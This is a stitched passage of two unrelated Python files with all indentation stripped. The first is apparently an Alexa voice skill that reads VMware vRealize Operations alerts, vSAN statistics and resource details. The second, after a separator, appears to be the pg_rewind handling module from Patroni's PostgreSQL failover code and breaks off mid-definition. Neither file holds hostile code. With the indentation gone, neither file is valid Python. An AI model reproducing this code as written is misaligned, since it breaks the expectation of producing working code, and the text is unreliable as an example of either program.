resourceText = "resources are"
if (len(alerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "For the alert: {0}, {1} {2} impacted. There are no more alerts. More information on this alert?".format(alertDefinition, numOfResources, resourceText)
else:
outputSpeech = "For the alert: {0}, {1} {2} impacted. Next or more info?".format(alertDefinition, numOfResources, resourceText)
session.attributes["AlertsIndex"] += 1
return outputSpeech
if session.attributes["CurrentTree"] == "Resource":
with open("sessionData/"+session.sessionId+"resAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["ResAlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["ResAlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more alerts. Would you like more information on this alert?".format(resourceName, alertDefinition)
elif len(criticalAlerts) == 0:
outputSpeech = "Reading active alerts from newest to oldest. The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
session.attributes["CurrentAlert"] = alert["alertId"]
return outputSpeech
def on_element_select(token):
if session.attributes["CurrentTree"] == "GroupedAlerts":
resource = vropsRequest("api/resources/"+token,"GET")
resourceProps = vropsRequest("api/resources/"+token+"/properties","GET")
resourceLatest = vropsRequest("api/resources/"+token+"/stats/latest","GET")
if resource["resourceKey"]["resourceKindKey"] == "VirtualMachine":
#Build complete response Here
vmname = resource["resourceKey"]["name"]
guestOS = [d["value"] for d in resourceProps["property"] if d["name"]=="config|guestFullName"][0]
numCpu = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|numCpu"][0]
memKB = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|memoryKB"][0]
toolsStatus = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsRunningStatus"][0]
toolsVersion = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsVersion"][0]
#guestDiskPercent = [d["statKey"]["data"] for d in resourceLatest["values"]["stat-list"]["stat"] if d["statKey"]["key"]=="guestfilesystem|percentage_total"]
text = {
"secondaryText": {
"type": "RichText",
"text": "<br/><b>Number of vCPU: </b>" + numCpu + "<br/>" + \
"<b>Memory Allocation (KB): </b>" + memKB + "<br/>" + \
"<b>Guest OS Name: </b>" + guestOS + "<br/>" + \
"<b>Tools Status: </b>" + toolsStatus + "<br/>" + \
"<b>Tools Version: </b>" + toolsVersion + "<br/>"
#"<b>Guest Filesystem Used: </b>" + guestDiskPercent + "%%<br/>"
},
"primaryText": {
"type": "RichText",
"text": "<font size='3'>"+resource["resourceKey"]["name"]+"</font>"
}
}
fullResponse = question("Here are the " + resource["resourceKey"]["resourceKindKey"] + " details"). \
display_render(title=resource["resourceKey"]["resourceKindKey"] + "details",template="BodyTemplate1",text=text,background_image_url=render_template('backgroundImageURL'),backButton='VISIBILE')
return fullResponse
def backout():
if session.attributes["CurrentTree"] == "Resource":
session.attributes["CurrentTree"] = "Alerts"
outputSpeech = "Returning to Critical Alerts list."
elif session.attributes["CurrentTree"] == "GroupedAlerts":
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
elif session.attributes["CurrentTree"] == "Alerts":
sessionCleanup()
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
else:
sessionCleanup()
outputSpeech = "I am waiting for your query"
return outputSpeech
def interactive_resp(data):
if session.attributes["CurrentTree"] == "GroupedAlerts":
listItems = []
resDict = session.attributes["resourceDict"]
for res in resDict:
listItem = {
"token":resDict[res],
"textContent": {
"primaryText": {
"text":res,
"type":"PlainText"
}
}
}
listItems.append(listItem)
enhancedResponse = question("Here are the impacted objects.").list_display_render(template="ListTemplate1", title="Impacted Objects", backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'), listItems=listItems)
return enhancedResponse
def liGetToken(user=liusername, passwd=lipassword, authSource=liprovider):
url = "https://" + liHost + "/api/v1/sessions"
payload = "{\n \"provider\":\"" + liprovider + "\",\n \"username\":\"" + liusername + "\",\n \"password\":\"" + lipassword + "\"\n}"
headers = {
'accept': "application/json",
'content-type': "application/json"
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
def vropsGetToken(user=vropsuser, passwd=vropspassword, authSource=vropsauthsource, host=vropsHost):
if not bearertoken:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + vropspassword + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
elif int(bearertoken["validity"])/1000 < time.time():
url = "https://" + host + "/suite-api/api/versions"
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json"
}
response = requests.request("GET", url, headers=headers, verify=verify)
if response.status_code == 401:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + vropspassword + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
else:
return json.dumps(bearertoken)
else:
return json.dumps(bearertoken)
def loginsightQuery(constraints,params,token):
url = "https://" + liHost + "/api/v1/aggregated-events/" + constraints + "?" + params
headers = {
'authorization': 'Bearer ' + token
}
response = requests.request('GET', url, headers=headers, verify=verify)
return response.text
def vropsRequest(request,method,querystring="",payload=""):
global bearertoken
bearertoken = json.loads(vropsGetToken())
url = "https://" + vropsHost + "/suite-api/" + request
querystring = querystring
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json",
'content-type': "application/json"
}
if (querystring != "") and (payload != ""):
response = requests.request(method, url, headers=headers, params=querystring, json=payload, verify=verify)
elif (querystring != ""):
response = requests.request(method, url, headers=headers, params=querystring, verify=verify)
elif (payload != ""):
response = requests.request(method, url, headers=headers, json=payload, verify=verify)
else:
response = requests.request(method, url, headers=headers, verify=verify)
print ("Request " + response.url + " returned status " + str(response.status_code))
print payload
return response.json()
def translate_resource_intent(resource):
resString = ""
vropsResKindString = {
'bms':'virtualmachine',
'bm':'virtualmachine',
'vms':'virtualmachine',
'vm':'virtualmachine',
'hosts': 'hostsystem',
'host': 'hostsystem',
'clusters': 'clustercomputeresource',
'cluster': 'clustercomputeresource',
'datastores': 'datastore',
'datastore': 'datastore'
}
# if intent['slots']['resource']['value'] in vropsResKindString:
resString = vropsResKindString.get(resource.lower())
return resString
def speechify_resource_intent(resource,plurality):
vocalString = ""
vocalStrings = {
'bm':'virtual machine',
'vm':'virtual machine',
'host': 'host system',
'cluster': 'cluster',
'datastore': 'data store',
'bms':'virtual machine',
'vms':'virtual machine',
'hosts': 'host system',
'clusters': 'cluster',
'datastores': 'data store'
}
if plurality:
vocalString = vocalStrings.get(resource.lower()) + "s"
else:
vocalString = vocalStrings.get(resource.lower())
return vocalString
def alerts_by_sev(alerts,sev):
filteredAlerts = []
if any(x == sev for x in ["INFO","WARNING","IMMEDIATE","CRITICAL"]):
for alert in alerts["alerts"]:
if alert["alertLevel"] == sev:
filteredAlerts.append(alert)
return filteredAlerts
def group_alerts_by_def(alerts,groupkey):
sortedAlerts = sorted(alerts, key=itemgetter(groupkey))
groupedAlerts = []
for key, items in groupby(sortedAlerts, itemgetter(groupkey)):
groupedAlerts.append(list(items))
return groupedAlerts
def sessionCleanup():
dir = "sessionData"
files = os.listdir(dir)
for file in files:
if file.startswith(session.sessionId):
os.remove(os.path.join(dir,file))
#####################################################
# Invocations
#####################################################
@ask.launch
def welcome_msg():
welcome_msg = render_template('welcome')
textContent = {
'primaryText': {
'text':'<font size="3">Intelligent Operations</font>',
'type':'RichText'
}
}
if (context.System.device.supportedInterfaces.Display):
return question(welcome_msg).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'),image=render_template('vrops340x340ImageURL'), \
hintText="Get Critical VM alerts")
else:
return question(welcome_msg)
@ask.intent('AMAZON.YesIntent')
def yesIntent():
outputSpeech = continues()
textContent = {
'primaryText': {
'text':"<font size='3'>"+outputSpeech+"</font>",
'type':'RichText'
}
}
title = 'Welcome to vRealize Operations'
image = ""
if (session.attributes["CurrentTree"] == "GroupedAlerts"):
title = "Alerts by Definition"
image = render_template('alert' + session.attributes['groupCriticality'] + 'ImageURL')
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title=title,template="BodyTemplate1",text=textContent,background_image_url=render_template('backgroundImageURL'),image=image)
else:
return question(outputSpeech)
@ask.intent('AMAZON.NextIntent')
def nextIntent():
outputSpeech = continues()
textContent = {
'primaryText': {
'text':"<font size='3'>"+outputSpeech+"</font>",
'type':'RichText'
}
}
title = 'Welcome to vRealize Operations'
image = ""
if (session.attributes["CurrentTree"] == "GroupedAlerts"):
title = "Alerts by Definition"
image = render_template('alert' + session.attributes['groupCriticality'] + 'ImageURL')
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title=title,template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'),image=image)
else:
return question(outputSpeech)
@ask.intent('MoreInformationIntent')
def MoreInformationIntent():
outputSpeech = more_info()
textContent = {
'primaryText': {
'text':outputSpeech,
'type':'PlainText'
}
}
if ((session.attributes["CurrentTree"] == "GroupedAlerts") and (context.System.device.supportedInterfaces.Display)):
enhancedResponse = interactive_resp(outputSpeech)
return enhancedResponse
elif (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
if (session.attributes["CurrentTree"]):
return question(outputSpeech)
else:
return question("I'm sorry, I don't understand your request")
@ask.intent('AMAZON.NoIntent')
def noIntent():
outputSpeech = backout()
textContent = {
'primaryText': {
'text':'Intelligent Operations',
'type':'PlainText'
}
}
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
return question(outputSpeech)
@ask.intent('Amazon.CancelIntent')
def cancelIntent():
outputSpeech = backout()
return question(outputSpeech)
@ask.intent('vSANStatusIntent')
def vsanstatus():
#build query Parameters
vsanworld_res = vropsRequest("api/resources","GET",querystring="resourceKind=vSAN World")
vsan_res_id = vsanworld_res["resourceList"][0]["identifier"]
begin = int(round(time.time()*1000-21600000))
end = int(round(time.time()*1000))
querystring = {"begin":begin,"end":end,"rollUpType":"AVG","intervalQuantifier":"7", \
"intervalType":"HOURS",\
"statKey": [ "summary|total_latency", \
"summary|total_iops", \
"summary|total_number_vms", \
"summary|total_cluster_count", \
"summary|vsan_diskspace_capacity", \
"summary|vsan_diskspace_capacity_used", \
"summary|remaining_capacity" ], \
"resourceId":vsan_res_id, }
#execute query and process
response = vropsRequest("api/resources/stats","GET",querystring)
#building response
stats_dict = dict()
for statitem in response["values"][0]["stat-list"]["stat"]:
stat_key = statitem["statKey"]["key"].split("|")[1].replace("_"," ").title()
if (stat_key.find("Cluster Count") != -1):
stat_key = "Number of Clusters"
if (stat_key.find("Capacity") != -1):
stat_key = stat_key + " in TB"
if (stat_key.find("Vsan") != -1):
stat_key = stat_key.replace("Vsan","")
if (stat_key.find("Total") != -1):
stat_key = stat_key.replace("Total","Average")
if (stat_key.find("Iops") != -1):
stat_key = stat_key.replace("Iops","IOPS")
if (stat_key.find("Vms") != -1):
stat_key = stat_key.replace("Vms","of VMs")
stat_key = stat_key.replace("Average","")
stats_dict[stat_key] = str(int(statitem["data"][0]))
#TODO add ordering to display so items appear in some logical ordering
secondaryText = "<br/>"
for key, value in sorted(stats_dict.iteritems(), key=lambda (k,v): (v,k)):
secondaryText = secondaryText + "<b> %s:</b> %s <br/>" %(key,value)
secondaryText = secondaryText + "<br/>"
text = {
"tertiaryText": {
"type":"RichText",
"text":"6 hour average statistics shown."
},
"secondaryText": {
"type": "RichText",
"text": secondaryText
},
"primaryText": {
"type": "RichText",
"text": "<b><font size='7'>vSAN Status</font></b>"
}
}
enhancedResponse = question("v SAN Status Report.").display_render(template="BodyTemplate2", title="Datacenter Operations", text=text,backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'),image=render_template('vsan340x340ImageURL'))
return enhancedResponse
@ask.intent('DataCenterCapacityIntent')
def dccapacity():
return question("Data Center Capacity Report")
@ask.intent('DataCenterActivityIntent')
#Runs several Log Insight and vROps queries to build a report for echo show
#TODO Make sure to add device checking and optimize for echo voice only
def dcactivity():
secondaryText = "<br/>"
with open("prefetch/dcreport", 'r') as dcreport:
report_data = json.load(dcreport)
for metric, value in report_data.iteritems():
item = "<b>Number of " + metric + ": </b>"
if not (value["bins"]):
item = item + "None"
else:
item = item + str(value["bins"][0]["value"])
secondaryText = secondaryText + item + "<br/>"
text = {
"secondaryText": {
"type": "RichText",
"text": secondaryText
},
"primaryText": {
"type": "RichText",
"text": "<font size='5'>Datacenter Activity Past 24 Hours</font>"
}
}
enhancedResponse = question("Datacenter Activity in the Past 24 Hours.").display_render(template="BodyTemplate2", title="Datacenter Operations", text=text,backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'), image=render_template('vsphere340x340ImageURL'))
return enhancedResponse
@ask.intent('GroupAlertsIntent')
#Starts a tree to read active alerts grouped by alert definition for the stated resource kind
#and criticality. Alert definitions are read by group with option list individual alerts in a group
def group_criticality_alerts(criticality, resource):
request = "api/alerts/query"
method = "POST"
payload = {
'resource-query': {
'resourceKind': [translate_resource_intent(resource)]
},
'activeOnly': True,
'alertCriticality': [criticality.upper()]
}
session.attributes["groupCriticality"] = criticality
alerts = vropsRequest(request,method,payload=payload)
numAllAlerts = str(alerts["pageInfo"]["totalCount"])
speech_output = "There are " + numAllAlerts + " " + criticality + " alerts for monitored " + speechify_resource_intent(resource,1) + ". " + \
"Shall I read the alerts by alert definition?"
textContent = {
'primaryText': {
'text': "<font size='7'>" + speech_output + "</font>",
'type':'RichText'
}
}
groupedAlerts = []
groupedAlerts = group_alerts_by_def(alerts['alerts'],'alertDefinitionId')
with open("sessionData/"+session.sessionId+"groupAlerts", 'w') as outfile:
json.dump(groupedAlerts, outfile)
session.attributes["AlertsIndex"] = 0
session.attributes["CurrentTree"] = "GroupedAlerts"
title = "Total " + criticality + " alerts for " + speechify_resource_intent(resource,1) + "."
return question(speech_output).display_render(
title=title,template="BodyTemplate1",text=textContent,background_image_url=render_template('backgroundImageURL',image="alertcriticalImageURL"))
@ask.intent('ListBadgeAlertsIntent')
#Starts a tree to read active alerts for the stated resource kind for a major badge.
#Alerts are read individually with option for more info depth for a resource
def list_badge_alerts(badge, resource):
request = "api/alerts/query"
method = "POST"
payload = {
'resource-query': {
'resourceKind': [translate_resource_intent(resource)]
},
'activeOnly': True,
'alertCriticality': ["CRITICAL","IMMEDIATE","WARNING","INFORMATION"],
'alertImpact': [badge]
}
alerts = vropsRequest(request,method,payload=payload)
numAllAlerts = str(alerts["pageInfo"]["totalCount"])
numImmediateAlerts = str(len(alerts_by_sev(alerts,"IMMEDIATE")))
numCriticalAlerts = str(len(alerts_by_sev(alerts,"CRITICAL")))
speech_output = "There are " + numAllAlerts + " " + badge + " alerts for monitored " + speechify_resource_intent(resource,1) + ". " + \
"Of those " + numCriticalAlerts + " are critical and " + numImmediateAlerts + " are immediate. Shall I read the critical alerts?"
textContent = {
'primaryText': {
'text': "<font size='3'>" + speech_output + "</font>",
'type':'RichText'
}
}
with open("sessionData/"+session.sessionId+"badgeAlerts", 'w') as outfile:
json.dump(alerts, outfile)
session.attributes["AlertsIndex"] = 0
session.attributes["CurrentTree"] = "Alerts"
if (context.System.device.supportedInterfaces.Display):
return question(speech_output).display_render(
title='Welcome to vRealize Operations',text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
return question(speech_output)
@ask.display_element_selected
def element():
fullResponse = on_element_select(request["token"])
return fullResponse
@ask.intent('getAlertsIntent')
@ask.intent('getOverallStatus')
@ask.intent('goodbyeIntent')
def goodbye_msg():
goodbye_msg = render_template('goodbye')
logging.debug("Session Ended")
sessionCleanup()
return statement(goodbye_msg)
@ask.session_ended
def session_ended():
logging.debug("Session Ended")
sessionCleanup()
return "", 200
if __name__ == '__main__':
bearertoken = json.loads(vropsGetToken())
background_thread = Thread(target=datacenter_report)
background_thread.daemon = True
background_thread.start()
app.run(debug=True)
|
rewind.py
|
import logging
import os
import shlex
import six
import subprocess
from threading import Lock, Thread
from .connection import get_connection_cursor
from .misc import format_lsn, parse_history, parse_lsn
from ..async_executor import CriticalTask
from ..dcs import Leader
logger = logging.getLogger(__name__)
REWIND_STATUS = type('Enum', (), {'INITIAL': 0, 'CHECKPOINT': 1, 'CHECK': 2, 'NEED': 3,
'NOT_NEED': 4, 'SUCCESS': 5, 'FAILED': 6})
class Rewind(object):
def __init__(self, postgresql):
self._postgresql = postgresql
self._checkpoint_task_lock = Lock()
self.reset_state()
@staticmethod
def configuration_allows_rewind(data):
return data.get('wal_log_hints setting', 'off') == 'on' or data.get('Data page checksum version', '0') != '0'
@property
def can_rewind(self):
""" check if pg_rewind executable is there and that pg_controldata indicates
we have either wal_log_hints or checksums turned on
"""
# low-hanging fruit: check if pg_rewind configuration is there
if not self._postgresql.config.get('use_pg_rewind'):
return False
cmd = [self._postgresql.pgcommand('pg_rewind'), '--help']
try:
ret = subprocess.call(cmd, stdout=open(os.devnull, 'w'), stderr=subprocess.STDOUT)
if ret != 0: # pg_rewind is not there, close up the shop and go home
return False
except OSError:
return False
return self.configuration_allows_rewind(self._postgresql.controldata())
@property
def can_rewind_or_reinitialize_allowed(self):
return self._postgresql.config.get('remove_data_directory_on_diverged_timelines') or self.can_rewind
def trigger_check_diverged_lsn(self):
if self.can_rewind_or_reinitialize_allowed and self._state != REWIND_STATUS.NEED:
self._state = REWIND_STATUS.CHECK
@staticmethod
def check_leader_is_not_in_recovery(conn_kwargs):
try:
with get_connection_cursor(connect_timeout=3, options='-c statement_timeout=2000', **conn_kwargs) as cur:
cur.execute('SELECT pg_catalog.pg_is_in_recovery()')
if not cur.fetchone()[0]:
return True
logger.info('Leader is still in_recovery and therefore can\'t be used for rewind')
except Exception:
return logger.exception('Exception when working with leader')
@staticmethod
def check_leader_has_run_checkpoint(conn_kwargs):
try:
with get_connection_cursor(connect_timeout=3, options='-c statement_timeout=2000', **conn_kwargs) as cur:
cur.execute("SELECT NOT pg_catalog.pg_is_in_recovery()" +
" AND ('x' || pg_catalog.substr(pg_catalog.pg_walfile_name(" +
" pg_catalog.pg_current_wal_lsn()), 1, 8))::bit(32)::int = timeline_id" +
" FROM pg_catalog.pg_control_checkpoint()")
if not cur.fetchone()[0]:
return 'leader has not run a checkpoint yet'
except Exception:
logger.exception('Exception when working with leader')
return 'not accessible or not healty'
def _get_checkpoint_end(self, timeline, lsn):
"""The checkpoint record size in WAL depends on postgres major version and platform (memory alignment).
Hence, the only reliable way to figure out where it ends, read the record from file with the help of pg_waldump
and parse the output. We are trying to read two records, and expect that it will fail to read the second one:
`pg_waldump: fatal: error in WAL record at 0/182E220: invalid record length at 0/182E298: wanted 24, got 0`
The error message contains information about LSN of the next record, which is exactly where checkpoint ends."""
lsn8 = format_lsn(lsn, True)
lsn = format_lsn(lsn)
out, err = self._postgresql.waldump(timeline, lsn, 2)
if out is not None and err is not None:
out = out.decode('utf-8').rstrip().split('\n')
err = err.decode('utf-8').rstrip().split('\n')
pattern = 'error in WAL record at {0}: invalid record length at '.format(lsn)
if len(out) == 1 and len(err) == 1 and ', lsn: {0}, prev '.format(lsn8) in out[0] and pattern in err[0]:
i = err[0].find(pattern) + len(pattern)
j = err[0].find(": wanted ", i)
if j > -1:
try:
return parse_lsn(err[0][i:j])
except Exception as e:
logger.error('Failed to parse lsn %s: %r', err[0][i:j], e)
logger.error('Failed to parse pg_%sdump output', self._postgresql.wal_name)
logger.error(' stdout=%s', '\n'.join(out))
logger.error(' stderr=%s', '\n'.join(err))
return 0
def _get_local_timeline_lsn_from_controldata(self):
in_recovery = timeline = lsn = None
data = self._postgresql.controldata()
try:
if data.get('Database cluster state') in ('shut down in recovery', 'in archive recovery'):
in_recovery = True
lsn = data.get('Minimum recovery ending location')
timeline = int(data.get("Min recovery ending loc's timeline"))
if lsn == '0/0' or timeline == 0: # it was a master when it crashed
data['Database cluster state'] = 'shut down'
if data.get('Database cluster state') == 'shut down':
in_recovery = False
lsn = data.get('Latest checkpoint location')
timeline = int(data.get("Latest checkpoint's TimeLineID"))
except (TypeError, ValueError):
logger.exception('Failed to get local timeline and lsn from pg_controldata output')
if lsn is not None:
try:
lsn = parse_lsn(lsn)
except (IndexError, ValueError) as e:
logger.error('Exception when parsing lsn %s: %r', lsn, e)
lsn = None
return in_recovery, timeline, lsn
def _get_local_timeline_lsn(self):
if self._postgresql.is_running(): # if postgres is running - get timeline from replication connection
in_recovery = True
timeline = self._postgresql.received_timeline() or self._postgresql.get_replica_timeline()
lsn = self._postgresql.replayed_location()
else: # otherwise analyze pg_controldata output
in_recovery, timeline, lsn = self._get_local_timeline_lsn_from_controldata()
log_lsn = format_lsn(lsn) if isinstance(lsn, six.integer_types) else lsn
logger.info('Local timeline=%s lsn=%s', timeline, log_lsn)
return in_recovery, timeline, lsn
@staticmethod
def _log_master_history(history, i):
start = max(0, i - 3)
end = None if i + 4 >= len(history) else i + 2
history_show = []
def format_history_line(line):
return '{0}\t{1}\t{2}'.format(line[0], format_lsn(line[1]), line[2])
for line in history[start:end]:
history_show.append(format_history_line(line))
if line != history[-1]:
history_show.append('...')
history_show.append(format_history_line(history[-1]))
logger.info('master: history=%s', '\n'.join(history_show))
def _conn_kwargs(self, member, auth):
ret = member.conn_kwargs(auth)
if not ret.get('dbname'):
ret['dbname'] = self._postgresql.database
# Add target_session_attrs in case more than one hostname is specified
# (libpq client-side failover) making sure we hit the primary
if 'target_session_attrs' not in ret and self._postgresql.major_version >= 100000:
ret['target_session_attrs'] = 'read-write'
return ret
def _check_timeline_and_lsn(self, leader):
in_recovery, local_timeline, local_lsn = self._get_local_timeline_lsn()
if local_timeline is None or local_lsn is None:
return
if isinstance(leader, Leader) and leader.member.data.get('role') != 'master':
return
if not self.check_leader_is_not_in_recovery(
self._conn_kwargs(leader, self._postgresql.config.replication)):
return
history = need_rewind = None
try:
with self._postgresql.get_replication_connection_cursor(**leader.conn_kwargs()) as cur:
cur.execute('IDENTIFY_SYSTEM')
master_timeline = cur.fetchone()[1]
logger.info('master_timeline=%s', master_timeline)
if local_timeline > master_timeline: # Not always supported by pg_rewind
need_rewind = True
elif local_timeline == master_timeline:
need_rewind = False
elif master_timeline > 1:
cur.execute('TIMELINE_HISTORY {0}'.format(master_timeline))
history = cur.fetchone()[1]
if not isinstance(history, six.string_types):
history = bytes(history).decode('utf-8')
logger.debug('master: history=%s', history)
except Exception:
return logger.exception('Exception when working with master via replication connection')
if history is not None:
history = list(parse_history(history))
for i, (parent_timeline, switchpoint, _) in enumerate(history):
if parent_timeline == local_timeline:
# We don't need to rewind when:
# 1. for replica: replayed location is not ahead of switchpoint
# 2. for the former primary: end of checkpoint record is the same as switchpoint
if in_recovery:
need_rewind = local_lsn > switchpoint
elif local_lsn >= switchpoint:
need_rewind = True
else:
need_rewind = switchpoint != self._get_checkpoint_end(local_timeline, local_lsn)
break
elif parent_timeline > local_timeline:
need_rewind = True
break
else:
need_rewind = True
self._log_master_history(history, i)
self._state = need_rewind and REWIND_STATUS.NEED or REWIND_STATUS.NOT_NEED
def rewind_or_reinitialize_needed_and_possible(self, leader):
if leader and leader.name != self._postgresql.name and leader.conn_url and self._state == REWIND_STATUS.CHECK:
self._check_timeline_and_lsn(leader)
return leader and leader.conn_url and self._state == REWIND_STATUS.NEED
def __checkpoint(self, task, wakeup):
try:
result = self._postgresql.checkpoint()
except Exception as e:
result = 'Exception: ' + str(e)
with task:
task.complete(not bool(result))
if task.result:
wakeup()
def ensure_checkpoint_after_promote(self, wakeup):
"""After promote issue a CHECKPOINT from a new thread and asynchronously check the result.
In case if CHECKPOINT failed, just check that timeline in pg_control was updated."""
if self._state == REWIND_STATUS.INITIAL and self._postgresql.is_leader():
with self._checkpoint_task_lock:
if self._checkpoint_task:
with self._checkpoint_task:
if self._checkpoint_task.result is not None:
self._state = REWIND_STATUS.CHECKPOINT
self._checkpoint_task = None
elif self._postgresql.get_master_timeline() == self._postgresql.pg_control_timeline():
self._state = REWIND_STATUS.CHECKPOINT
else:
self._checkpoint_task = CriticalTask()
Thread(target=self.__checkpoint, args=(self._checkpoint_task, wakeup)).start()
def checkpoint_after_promote(self):
return self._state == REWIND_STATUS.CHECKPOINT
def _fetch_missing_wal(self, restore_command, wal_filename):
cmd = ''
length = len(restore_command)
i = 0
while i < length:
if restore_command[i] == '%' and i + 1 < length:
i += 1
if restore_command[i] == 'p':
cmd += os.path.join(self._postgresql.wal_dir, wal_filename)
elif restore_command[i] == 'f':
cmd += wal_filename
elif restore_command[i] == 'r':
cmd += '000000010000000000000001'
elif restore_command[i] == '%':
cmd += '%'
else:
cmd += '%'
i -= 1
else:
cmd += restore_command[i]
i += 1
logger.info('Trying to fetch the missing wal: %s', cmd)
return self._postgresql.cancellable.call(shlex.split(cmd)) == 0
def _find_missing_wal(self, data):
# could not open file "$PGDATA/pg_wal/0000000A00006AA100000068": No such file or directory
pattern = 'could not open file "'
for line in data.decode('utf-8').split('\n'):
b = line.find(pattern)
if b > -1:
b += len(pattern)
e = line.find('": ', b)
if e > -1 and '/' in line[b:e]:
waldir, wal_filename = line[b:e].rsplit('/', 1)
if waldir.endswith('/pg_' + self._postgresql.wal_name) and len(wal_filename) == 24:
return wal_filename
def pg_rewind(self, r):
# prepare pg_rewind connection
env = self._postgresql.config.write_pgpass(r)
env.update(LANG='C', LC_ALL='C', PGOPTIONS='-c statement_timeout=0')
dsn = self._postgresql.config.format_dsn(r, True)
logger.info('running pg_rewind from %s', dsn)
restore_command = self._postgresql.config.get('recovery_conf', {}).get('restore_command') \
if self._postgresql.major_version < 120000 else self._postgresql.get_guc_value('restore_command')
# currently, pg_rewind expects postgresql.conf to be inside $PGDATA, which is not the case on e.g. Debian
# Fix this logic if e.g. PG15 receives an update for pg_rewind:
pg_rewind_can_restore = self._postgresql.major_version >= 130000 \
and restore_command \
and self._postgresql.config._config_dir == self._postgresql.data_dir
cmd = [self._postgresql.pgcommand('pg_rewind')]
if pg_rewind_can_restore:
cmd.append('--restore-target-wal')
cmd.extend(['-D', self._postgresql.data_dir, '--source-server', dsn])
while True:
results = {}
ret = self._postgresql.cancellable.call(cmd, env=env, communicate=results)
logger.info('pg_rewind exit code=%s', ret)
if ret is None:
return False
logger.info(' stdout=%s', results['stdout'].decode('utf-8'))
logger.info(' stderr=%s', results['stderr'].decode('utf-8'))
if ret == 0:
return True
if not restore_command or pg_rewind_can_restore:
return False
missing_wal = self._find_missing_wal(results['stderr']) or self._find_missing_wal(results['stdout'])
if not missing_wal:
return False
if not self._fetch_missing_wal(restore_command, missing_wal):
logger.info('Failed to fetch WAL segment %s required for pg_rewind', missing_wal)
return False
def execute(self, leader):
if self._postgresql.is_running() and not self._postgresql.stop(checkpoint=False):
return logger.warning('Can not run pg_rewind because postgres is still running')
# prepare pg_rewind connection
r = self._conn_kwargs(leader, self._postgresql.config.rewind_credentials)
# 1. make sure that we are really trying to rewind from the master
# 2. make sure that pg_control contains the new timeline by:
# running a checkpoint or
# waiting until Patroni on the master will expose checkpoint_after_promote=True
checkpoint_status = leader.checkpoint_after_promote if isinstance(leader, Leader) else None
if checkpoint_status is None: # we are the standby-cluster leader or master still runs the old Patroni
# superuser credentials match rewind_credentials if the latter are not provided or we run 10 or older
if self._postgresql.config.superuser == self._postgresql.config.rewind_credentials:
leader_status = self._postgresql.checkpoint(
self._conn_kwargs(leader, self._postgresql.config.superuser))
else: # we run 11+ and have a dedicated pg_rewind user
leader_status = self.check_leader_has_run_checkpoint(r)
if leader_status: # we tried to run/check for a checkpoint on the remote leader, but it failed
return logger.warning('Can not use %s for rewind: %s', leader.name, leader_status)
elif not checkpoint_status:
return logger.info('Waiting for checkpoint on %s before rewind', leader.name)
elif not self.check_leader_is_not_in_recovery(r):
return
if self.pg_rewind(r):
self._state = REWIND_STATUS.SUCCESS
elif not self.check_leader_is_not_in_recovery(r):
logger.warning('Failed to rewind because master %s become unreachable', leader.name)
else:
logger.error('Failed to rewind from healty master: %s', leader.name)
for name in ('remove_data_directory_on_rewind_failure', 'remove_data_directory_on_diverged_timelines'):
if self._postgresql.config.get(name):
logger.warning('%s is set. removing...', name)
self._postgresql.remove_data_directory()
self._state = REWIND_STATUS.INITIAL
break
else:
self._state = REWIND_STATUS.FAILED
return False
def reset_state(self):
self._state = REWIND_STATUS.INITIAL
with self._checkpoint_task_lock:
self._checkpoint_task = None
@property
def is_needed(self):
return self._state in (REWIND_STATUS.CHECK, REWIND_STATUS.NEED)
@property
def executed(self):
return self._state > REWIND_STATUS.NOT_NEED
@property
def failed(self):
return self._state == REWIND_STATUS.FAILED
def read_postmaster_opts(self):
